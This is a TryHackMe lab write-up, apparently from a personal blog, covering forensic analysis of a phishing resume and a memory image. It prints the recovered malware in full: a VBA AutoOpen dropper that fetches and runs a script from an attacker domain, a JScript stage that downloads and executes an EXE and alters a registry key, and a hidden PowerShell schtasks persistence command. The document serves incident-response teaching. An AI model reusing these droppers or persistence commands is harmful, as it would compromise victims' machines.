<!doctype html><html lang="en" data-mode="dark"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7"><meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><meta name="viewport" content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover" ><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="Boogeyman 2" /><meta name="author" content="Ibrahim" /><meta property="og:locale" content="en" /><meta name="description" content="The Boogeyman is back. Are you still afraid of the Boogeyman?" /><meta property="og:description" content="The Boogeyman is back. Are you still afraid of the Boogeyman?" /><link rel="canonical" href="/posts/boogeyman-2/" /><meta property="og:url" content="/posts/boogeyman-2/" /><meta property="og:site_name" content="Ibrahim EO." /><meta property="og:image" content="/assets/img/tryhackme/boogeyman2/boogeythum.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2024-11-05T00:00:00+01:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="/assets/img/tryhackme/boogeyman2/boogeythum.png" /><meta property="twitter:title" content="Boogeyman 2" /><meta name="twitter:site" content="@twitter_username" /><meta name="twitter:creator" content="@Ibrahim" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Ibrahim"},"dateModified":"2024-11-05T00:00:00+01:00","datePublished":"2024-11-05T00:00:00+01:00","description":"The Boogeyman is back. Are you still afraid of the Boogeyman?","headline":"Boogeyman 2","image":"/assets/img/tryhackme/boogeyman2/boogeythum.png","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/boogeyman-2/"},"url":"/posts/boogeyman-2/"}</script><title>Boogeyman 2 | Ibrahim EO.</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Ibrahim EO."><meta name="application-name" content="Ibrahim EO."><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="/assets/css/elomarii-portfolio.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.2/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.27.20/dist/tocbot.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css"> <script async src="https://www.googletagmanager.com/gtag/js?id=G-X4YT79QSQC"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-X4YT79QSQC'); </script><body><aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end"><header class="profile-wrapper"> <a href="/" id="avatar" class="rounded-circle"><img src="/assets/avatar.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a><h1 class="site-title"> <a href="/whoami">Ibrahim EO.</a></h1><p class="site-subtitle fst-italic mb-0">Information Systems Engineer / InfoSec Enthousiaste</p></header><nav class="flex-column flex-grow-1 w-100 ps-0"><ul class="nav"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/projects/" class="nav-link"> <i class="fa-fw fas fa-bars-progress"></i> <span>PROJECTS</span> </a><li class="nav-item"> <a href="/blog/" class="nav-link"> <i class="fa-fw fas fa-newspaper"></i> <span>BLOG</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/whoami/" class="nav-link"> <i class="fa-fw fas fa-chess-rook"></i> <span>WHOAMI</span> </a></ul></nav><div class="sidebar-bottom d-flex flex-wrap align-items-center w-100"> <a href="https://github.com/elomarii" aria-label="github" target="_blank" rel="noopener noreferrer" > <i class="fab fa-github"></i> </a> <a href="https://www.linkedin.com/in/ibrahim-el-omari/" aria-label="linkedin" target="_blank" rel="noopener noreferrer" > <i class="fab fa-linkedin"></i> </a> <a href="javascript:location.href = 'mailto:' + ['i.ibrahim.elomari','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a></div></aside><div id="main-wrapper" class="d-flex justify-content-center"><div class="container d-flex flex-column px-xxl-5"><header id="topbar-wrapper" aria-label="Top Bar"><div id="topbar" class="d-flex align-items-center justify-content-between px-lg-3 h-100" ><nav id="breadcrumb" aria-label="Breadcrumb"> <span> <a href="/">Home</a> </span> <span>Boogeyman 2</span></nav><button type="button" id="sidebar-trigger" class="btn btn-link"> <i class="fas fa-bars fa-fw"></i> </button><div id="topbar-title"> Post</div><button type="button" id="search-trigger" class="btn btn-link"> <i class="fas fa-search fa-fw"></i> </button> <search id="search" class="align-items-center ms-3 ms-lg-0"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..." > </search> <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button></div></header><div class="row flex-grow-1"><main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4"><article class="px-1"><header><h1 data-toc-skip>Boogeyman 2</h1><p class="post-desc fw-light mb-4">The Boogeyman is back. Are you still afraid of the Boogeyman?</p><div class="post-meta text-muted"> <span> Posted <time data-ts="1730761200" data-df="ll" data-bs-toggle="tooltip" data-bs-placement="bottom" > Nov 5, 2024 </time> </span><div class="d-flex justify-content-between"> <span> By <em> Ibrahim </em> </span><div> <span class="readtime" data-bs-toggle="tooltip" data-bs-placement="bottom" title="1317 words" > <em>7 min</em> read</span></div></div></div></header><div class="content"><p><a href="/assets/img/tryhackme/boogeyman2/boogeybanner.png" class="popup img-link shimmer"><img src="/assets/img/tryhackme/boogeyman2/boogeybanner.png" alt="banner" loading="lazy"></a></p><blockquote class="prompt-info"><p>After having a severe attack from the Boogeyman, Quick Logistics LLC improved its security defences. However, the Boogeyman returns with new and improved tactics, techniques and procedures.. Check out Boogeyman series on TryHackMe: <a href="https://tryhackme.com/jr/boogeyman1">Boogeyman 1</a> , <a href="https://tryhackme.com/jr/boogeyman2">Boogeyman 2</a> , and <a href="https://tryhackme.com/jr/boogeyman3">Boogeyman 3</a>.</p></blockquote><p>Story time:</p><blockquote><p>Maxine, a Human Resource Specialist working for Quick Logistics LLC, received an application from one of the open positions in the company. Unbeknownst to her, the attached resume was malicious and compromised her workstation. The security team was able to flag some suspicious commands executed on the workstation of Maxine, which prompted the investigation. Given this, you are tasked to analyse and assess the impact of the compromise.</p></blockquote><h2 id="i-email-analysis"><span class="me-2">I. Email analysis</span><a href="#i-email-analysis" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Another phishing campaign was successful, shout out to the Boogeyman perseverance. That is actually not surprising knowing that phishing was and still one of the top initial access vectors<sup id="fnref:ibm"><a href="#fn:ibm" class="footnote" rel="footnote" role="doc-noteref">1</a></sup>.</p><p>Let’s take a look at our phishing email. Basic information; <kbd>Wesley Taylor</kbd> sent a job application to <kbd>Maxine Beck</kbd> and attached his resume <kbd>Resume_WesleyTaylor.doc</kbd> with the email.</p><p><a href="/assets/img/tryhackme/boogeyman2/image.png" class="popup img-link shimmer"><img src="/assets/img/tryhackme/boogeyman2/image.png" alt="alt text" loading="lazy"></a> <em>Phishing email</em></p><p>Md5 hash of the email</p><div class="language-terminal highlighter-rouge"><div class="code-header"> <span data-label-text="Terminal"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">md5sum </span>Resume_WesleyTaylor.doc
<span class="go">
52c4384a0b9e248b95804352ebec6c5b  Resume_WesleyTaylor.doc
</span></pre></table></code></div></div><p>To analyze this Office document, we’ll be using Olevba, which is a tool for analysing and extracting VBA macros from Microsoft Office documents. This tool is also a part of the Oletools<sup id="fnref:ole"><a href="#fn:ole" class="footnote" rel="footnote" role="doc-noteref">2</a></sup> suite.</p><p>Using the tool is pretty straight forward, let’s check the result of anlyzing Wesley’s resume</p><div class="language-terminal highlighter-rouge"><div class="code-header"> <span data-label-text="Terminal"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>olevba Resume_WesleyTaylor.doc 
<span class="go">
...SNIP...
Sub AutoOpen()

spath = "C:\ProgramData\"
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png", False
xHttp.Send
With bStrm
    .Type = 1
    .Open
    .write xHttp.responseBody
    .savetofile spath &amp; "\update.js", 2
End With

Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("wscript.exe C:\ProgramData\update.js")

End Sub
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
| ...SNIP...                                                                  |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |https://files.boogey|URL                                          |
|          |manisback.lol/aa2a9c|                                             |
|          |53cbb80416d3b47d8553|                                             |
|          |8d9971/update.png   |                                             |
|IOC       |update.js           |Executable file name                         |
|IOC       |wscript.exe         |Executable file name                         |
+----------+--------------------+---------------------------------------------+
</span></pre></table></code></div></div><p>As we can see, the <code class="language-plaintext highlighter-rouge">.doc</code> document was a first stage of the actual payload. The second stage can be spotted very easly from the HTTP request to Boogeyman’s website <code class="language-plaintext highlighter-rouge">files.boogeymanisback.lol</code>.</p><p>The file <code class="language-plaintext filepath highlighter-rouge">update.png</code> was downloaded and saved to <kbd>C:\ProgramData\</kbd> as <kbd>update.js</kbd>. An instance of <code class="language-plaintext highlighter-rouge">WScript.shell</code> was then created to access OS shell methods. We can infere that update.js is actually a PowerShell script.</p><p>With these information, we can proceed to analyse the memory image.</p><h2 id="ii-memory-forensics"><span class="me-2">II. Memory forensics</span><a href="#ii-memory-forensics" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Having an image of the compromised machine’s memory, we can start our investigation by checking the list of running processes, knowing from the previous results that the malicious document executed the process <kbd>wscript.exe</kbd>.</p><div class="language-terminal highlighter-rouge"><div class="code-header"> <span data-label-text="Terminal"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>vol <span class="nt">-f</span> WKSTN-2961.raw windows.pslist
<span class="go">
Volatility 3 Framework 2.5.0
Progress:  100.00		PDB scanning finished                        
PID	    PPID	ImageFileName	Offset(V)	    Threads	Handles	SessionId	Wow64	CreateTime	                ExitTime	File output
...SNIP...
4260	1124	wscript.exe	    0xe58f864ca0c0	6	    -	    3	        False	2023-08-21 14:12:47.000000 	N/A	        Disabled
6216	4260	updater.exe	    0xe58f87ac0080	18	    -	    3	        False	2023-08-21 14:12:48.000000 	N/A	        Disabled
4464	6216	conhost.exe	    0xe58f84bd1080	5	    -	    3	        False	2023-08-21 14:14:03.000000 	N/A	        Disabled
6332	6932	DumpIt.exe	    0xe58f87a870c0	3	    -	    3	        True	2023-08-21 14:14:25.000000 	N/A	        Disabled
</span></pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">wscript.exe</code> PID is <kbd>4260</kbd> and its parent PID, which is <code class="language-plaintext highlighter-rouge">WORD.exe</code> btw, is <kbd>1124</kbd>. We are very curious about what is the content of the 2nd stage of the payload so we’ll try to find that <code class="language-plaintext filepath highlighter-rouge">update.png</code> file. Volatility plugin <code class="language-plaintext highlighter-rouge">filescan</code> scans for file objects present in a particular/or all Windows memory image. We use this pluging to check for files of MAxine that are loaded to memory:</p><div class="language-terminal highlighter-rouge"><div class="code-header"> <span data-label-text="Terminal"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>vol <span class="nt">-f</span> WKSTN-2961.raw windows.filescan | <span class="nb">grep </span>maxine
<span class="go">
...SNIP...
0xe58f836ebeb0  \Users\maxine.beck\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464        216
0xe58f836ec4f0  \Users\maxine.beck\Music\desktop.ini    216
0xe58f836edc60  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\IE\GEX3PLZ6\update[1].png  216
0xe58f83bd4600  \Users\maxine.beck\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CF5B04DF-852B-4FCA-92D6-E3B99CF5ED2F 216
0xe58f8609a110  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache    216
0xe58f862dc3d0  \Users\maxine.beck\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat     216
0xe58f86465740  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc     216
...SNIP...
</span></pre></table></code></div></div><p>Look at that <code class="language-plaintext filepath highlighter-rouge">update[1].png</code>, it looks like our file. We can use another plugin, i.e. <code class="language-plaintext highlighter-rouge">dumpfile</code>, to extract that file from memory using its virtual address.</p><div class="language-terminal highlighter-rouge"><div class="code-header"> <span data-label-text="Terminal"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>vol <span class="nt">-f</span> WKSTN-2961.raw windows.dumpfiles <span class="nt">--virtaddr</span> 0xe58f836edc60
<span class="go">
Volatility 3 Framework 2.5.0
Progress:  100.00		PDB scanning finished                        
Cache	FileObject	FileName	Result
DataSectionObject	0xe58f836edc60	update[1].png	file.0xe58f836edc60.0xe58f87ddb320.DataSectionObject.update[1].png.dat
</span></pre></table></code></div></div><p>Here we go. This turned out to be a famous malware and even my Windows Defender detected its pattern and flaged it (the whole Markdown file where I’m writing this) as malicious.</p><div file="update[1].png" class="language-powershell highlighter-rouge"><div class="code-header"> <span data-label-text="update[1].png"><i class="far fa-file-code fa-fw"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre><td class="rouge-code"><pre><span class="kr">var</span><span class="w"> </span><span class="n">Object</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">WScript.CreateObject</span><span class="p">(</span><span class="s1">'MSXML2.XMLHTTP'</span><span class="p">);</span><span class="w">
</span><span class="kr">var</span><span class="w"> </span><span class="n">wshell</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="nx">ActiveXObject</span><span class="p">(</span><span class="s2">"WScript.Shell"</span><span class="p">);</span><span class="w">

</span><span class="kr">var</span><span class="w"> </span><span class="n">location</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"C:\\Windows\\Tasks\\"</span><span class="p">;</span><span class="w">
</span><span class="kr">var</span><span class="w"> </span><span class="n">filename</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"updater.exe"</span><span class="p">;</span><span class="w">

</span><span class="kr">var</span><span class="w"> </span><span class="n">url</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe"</span><span class="w">
</span><span class="n">Object.Open</span><span class="p">(</span><span class="s1">'GET'</span><span class="p">,</span><span class="w"> </span><span class="n">url</span><span class="p">,</span><span class="w"> </span><span class="nx">false</span><span class="p">);</span><span class="w">
</span><span class="n">Object.Send</span><span class="p">();</span><span class="w">

</span><span class="kr">if</span><span class="w"> </span><span class="p">(</span><span class="n">Object.Status</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">200</span><span class="p">)</span><span class="w">
</span><span class="p">{</span><span class="w">
 </span><span class="kr">var</span><span class="w"> </span><span class="n">Stream</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">WScript.CreateObject</span><span class="p">(</span><span class="s1">'ADODB.Stream'</span><span class="p">);</span><span class="w">
 </span><span class="n">Stream.Open</span><span class="p">();</span><span class="w">
 </span><span class="n">Stream.Type</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"> </span><span class="n">//</span><span class="w"> </span><span class="nx">Stream</span><span class="w"> </span><span class="nx">type</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">set</span><span class="w"> </span><span class="nx">binary</span><span class="w"> </span><span class="nx">stream</span><span class="w">
 </span><span class="n">Stream.Write</span><span class="p">(</span><span class="n">Object.ResponseBody</span><span class="p">);</span><span class="w">
 </span><span class="n">Stream.Position</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w">
 </span><span class="n">Stream.SaveToFile</span><span class="p">(</span><span class="n">location</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">filename</span><span class="p">,</span><span class="w"> </span><span class="nx">2</span><span class="p">);</span><span class="w"> </span><span class="n">//</span><span class="w"> </span><span class="nx">option</span><span class="w"> </span><span class="nx">2</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">force</span><span class="w"> </span><span class="nx">overwrite</span><span class="w">
 </span><span class="n">Stream.Close</span><span class="p">();</span><span class="w">
</span><span class="p">}</span><span class="w">

</span><span class="n">wshell.Run</span><span class="p">(</span><span class="s2">"cmd.exe /c reg.exe add \"</span><span class="n">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User</span><span class="w"> </span><span class="nx">Shell</span><span class="w"> </span><span class="nx">Folders\</span><span class="s2">" /v C:\\Windows\\Tasks /f"</span><span class="p">);</span><span class="w">


</span><span class="n">wshell.Run</span><span class="p">(</span><span class="n">location</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">filename</span><span class="p">);</span><span class="w">
</span><span class="n">WScript.Sleep</span><span class="p">(</span><span class="mi">5</span><span class="o">*</span><span class="mi">60</span><span class="o">*</span><span class="mi">1000</span><span class="p">);</span><span class="w">
</span></pre></table></code></div></div><p>As we can see, the script starts by downloading a binary <code class="language-plaintext highlighter-rouge">update.exe</code> and saving it to <kbd>C:\Windows\Tasks\updater.exe</kbd>. The <code class="language-plaintext highlighter-rouge">C:\Windows\Tasks</code> folder is typically used by the Task Scheduler in Windows to store information about scheduled tasks. On the other hand, the <code class="language-plaintext highlighter-rouge">User Shell Folders</code> registry key in Windows is used to define the locations of various user profile folders, such as the Desktop, Documents, Downloads, and others. These folders are part of the user’s environment, and Windows uses this registry key to identify where certain default folders are stored. This allows applications and Windows itself to retrieve paths for commonly used directories, which can vary by user or be redirected to network locations.</p><p>It looks like Boogeyman is trying altering system behavior to run malware whenever the user accesses or saves data to a specific folder, thereby making himself more persistent and harder to remove.</p><p>Looking back to the processes list, <code class="language-plaintext highlighter-rouge">updater.exe</code> is of PID <kbd>6216</kbd>. Based on this information, we trace the connections to the C2 server using <code class="language-plaintext highlighter-rouge">netscan</code> plugin</p><div class="language-terminal highlighter-rouge"><div class="code-header"> <span data-label-text="Terminal"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>vol <span class="nt">-f</span> WKSTN-2961.raw windows.netscan
<span class="go">
Offset	        Proto	LocalAddr	LocalPort   ForeignAddr ForeignPort	State	PID	    Owner	    Created
...SNIP...
0xe58f86a9d950	UDPv4	0.0.0.0         0           *	0		660         lsass.exe	2023-08-21 13:59:26.000000 
0xe58f86a9d950	UDPv6	::	        0           *	0		660 	    lsass.exe	2023-08-21 13:59:26.000000 
0xe58f86b1b770	TCPv4	10.10.49.181	63331	    128.199.95.189	8080	CLOSED	6216	updater.exe	2023-08-21 14:15:17.000000 
0xe58f86b73010	TCPv4	10.10.49.181	63308	    128.199.95.189	8080	CLOSED	6216	updater.exe	2023-08-21 14:14:39.000000 
0xe58f86b9ebf0	TCPv4	10.10.49.181	63291	    128.199.95.189	8080	CLOSED	6216	updater.exe	2023-08-21 14:14:13.000000 
0xe58f86ba7bf0	TCPv4	10.10.49.181	63242	    20.189.173.10	443	    CLOSED	1124	WINWORD.EXE	2023-08-21 14:12:39.000000 
</span></pre></table></code></div></div><p>Finally with the last piece of information we are curious about, what the Boogey scheduled on the compromised machine. We know that <code class="language-plaintext highlighter-rouge">schtasks.exe</code> is the process used to do this job on windows. However, the process is not listed using neither <code class="language-plaintext highlighter-rouge">pslist</code> nor <code class="language-plaintext highlighter-rouge">psscan</code>, and no command line traces of its execution are available with <code class="language-plaintext highlighter-rouge">cmdline</code> plugin. Thus, there is nothing Volatility can do for us.</p><p>A harsh approch would consist of parsing the memory image for entries with <code class="language-plaintext highlighter-rouge">schtasks</code> string. This actually works and as we can see, there is a message indicating C2 connection successful establishment:</p><div class="language-terminal highlighter-rouge"><div class="code-header"> <span data-label-text="Terminal"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">cat</span> <span class="nt">-A</span> WKSTN-2961.raw | <span class="nb">grep </span>schtask
<span class="go">
...SNIP...
M-^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
^@^@^@^@^@^@^@^@^@^@BkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAGgAbABGAEsAcwBBAE8AagA9AFkAYg
BNAEwANwAxAGsAUgBtAEsAZQBBADUAMAAzAE0AOABWAGoAcwA4AFcAOABXADQAZgBZAD0AIgApADsAJABkAGEAdABhAD0AJAB3AG
MALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAuAC4AMw
BdADsAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC4AJABkAGEAdABhAC4AbABlAG4AZwB0AGgAXQA7AC0AagBvAGkAbgBbAE
</span><span class="gp">MAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=;</span>schtasks /Cre
<span class="go">ate /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.ex
e -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp 
</span><span class="gp">HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\"';</span><span class="s1">'Schtasks persistence established
</span><span class="go">using listener http stored in HKCU:\Software\Microsoft\Windows\CurrentVersion\debug with Updater dai
</span><span class="gp">ly trigger at 09:00.'^M$</span><span class="w">
</span><span class="go">...SNIP...
</span></pre></table></code></div></div><h2 id="iii-footnotes"><span class="me-2">III. Footnotes</span><a href="#iii-footnotes" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><div class="footnotes" role="doc-endnotes"><ol><li id="fn:ibm"><p>Threat Intelligence Index, IBM X-Force, 2024 <a href="#fnref:ibm" class="reversefootnote" role="doc-backlink">&#8617;&#xfe0e;</a></p><li id="fn:ole"><p>OLE2 files and MS Office documents analysis (<a href="https://github.com/decalage2/oletools">Oletools</a>) <a href="#fnref:ole" class="reversefootnote" role="doc-backlink">&#8617;&#xfe0e;</a></p></ol></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw me-1"></i> <a href="/blog/ctf-writeups/">CTF Writeups</a>, <a href="/blog/tryhackme/">TryHackMe</a>, <a href="/blog/soc-1/">SOC 1</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw me-1"></i> <a href="/tags/dfir/" class="post-tag no-text-decoration" >DFIR</a> <a href="/tags/phishing/" class="post-tag no-text-decoration" >Phishing</a> <a href="/tags/volatility/" class="post-tag no-text-decoration" >Volatility</a> <a href="/tags/olevba/" class="post-tag no-text-decoration" >Olevba</a></div><div class=" post-tail-bottom d-flex justify-content-between align-items-center mt-5 pb-2 " ><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper d-flex align-items-center"> <span class="share-label text-muted">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Boogeyman%202%20-%20Ibrahim%20EO.&url=%2Fposts%2Fboogeyman-2%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter"> <i class="fa-fw fa-brands fa-square-x-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Boogeyman%202%20-%20Ibrahim%20EO.&u=%2Fposts%2Fboogeyman-2%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=%2Fposts%2Fboogeyman-2%2F&text=Boogeyman%202%20-%20Ibrahim%20EO." target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <button id="copy-link" aria-label="Copy link" class="btn small" data-bs-toggle="tooltip" data-bs-placement="top" title="Copy link" data-title-succeed="Link copied successfully!" > <i class="fa-fw fas fa-link pe-none fs-6"></i> </button> </span></div></div></div></article></main><aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted"><div class="access"><section id="access-lastmod"><h2 class="panel-heading">Recently Updated</h2><ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2"><li class="text-truncate lh-lg"> <a href="/projects/attack-titan/">Shingeki</a><li class="text-truncate lh-lg"> <a href="/projects/chirpy-react/">Chirpy React</a><li class="text-truncate lh-lg"> <a href="/projects/passman/">PassMan</a><li class="text-truncate lh-lg"> <a href="/posts/hammer/">Hammer</a><li class="text-truncate lh-lg"> <a href="/posts/boogeyman-3/">Boogeyman 3</a></ul></section><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/tags/dfir/">DFIR</a> <a 